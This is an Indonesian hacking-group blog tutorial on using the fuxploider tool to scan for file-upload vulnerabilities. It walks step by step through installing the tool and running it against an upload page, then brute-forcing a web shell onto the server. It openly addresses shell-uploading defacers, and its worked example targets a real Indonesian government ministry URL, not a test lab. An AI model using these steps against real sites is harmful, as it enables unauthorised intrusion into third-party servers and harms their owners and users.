Kali Linux : Arbitrary File Upload Vulnerability Scanning Dengan Fuxploider



Hai gays kembali lagi bersama gw yukinoshita47 kali ini gw mau share tutorial lagi kali ini tutorial tentang Vulnerability Analysis yang mungkin cocok buat wajah-wajah tukang upload shell kayak lu pade wkwkwkwkwkwk

oke langsung aja

pertama buka terminal
 


kemudian download tools nya dari github dengan menggunakan perintah

git clone https://github.com/almandin/fuxploider

kemudian tekan enter



kemudian masuk ke dalam direktori tools nya dengan menggunakan perintah

cd fuxploider

kemudian tekan enter



kemudian install dulu python3-pip nya

khusus untuk kali linux versi lama atau versi dibawah tahun 2018

gunakan perintah

apt-get install python3-pip

kemudian tekan enter

---

khusus untuk kali linux 2018 dan yang terbaru

gunakan perintah

apt install python3-pip

kemudian tekan enter





kemudian install dependencies nya dengan menggunakan perintah

pip3 install -r requirements.txt

kemudian tekan enter


setelah selesai install dependencies nya
jalankan tools nya dengan menggunakan perintah

python3 fuxploider.py

kemudian tekan enter

untuk melihat informasi tools gunakan perintah

python3 fuxploider.py -h

kemudian tekan enter



lalu bagaimana cara gunakan tools nya untuk uji coba target nya ?

kita test

cara nya gunakan perintah

python3 fuxploider.py --url http://situstarget.com/letak-file-upload.php --not-regex "wrong file type"

contoh

python3 fuxploider.py --url http://www.itjen.depkes.go.id/public/filemanager/img/ico_dark/uploader.php --not-regex "wrong file type"

kemudian tekan enter maka tool nya akan coba validasi extensi file yang akan di upload



tekan y untuk coba bruteforce upload file shell nya


contoh jika bruteforce upload shell nya berhasil akan muncul seperti gambar dibawah ini


oke cukup sampai disini tutorial kali ini gays kalo ada salah dan kurang dimaklumi aja gays  sampai jumpa di tutorial selanjutnya

sekian dan terimakasih

regard

Drs. Yukinoshita47. HAMBA ALLAH YANG MENCARI RIDHO NYA



Garuda Security Hacker Official Team



Official Website Portal : Garuda Security Hacker | Official Website Portal
Official Fanspage : Garuda Security Hacker | Official Fanspage
Official Channel YouTube : Garuda Security Hacker | Official Channel

0 comments: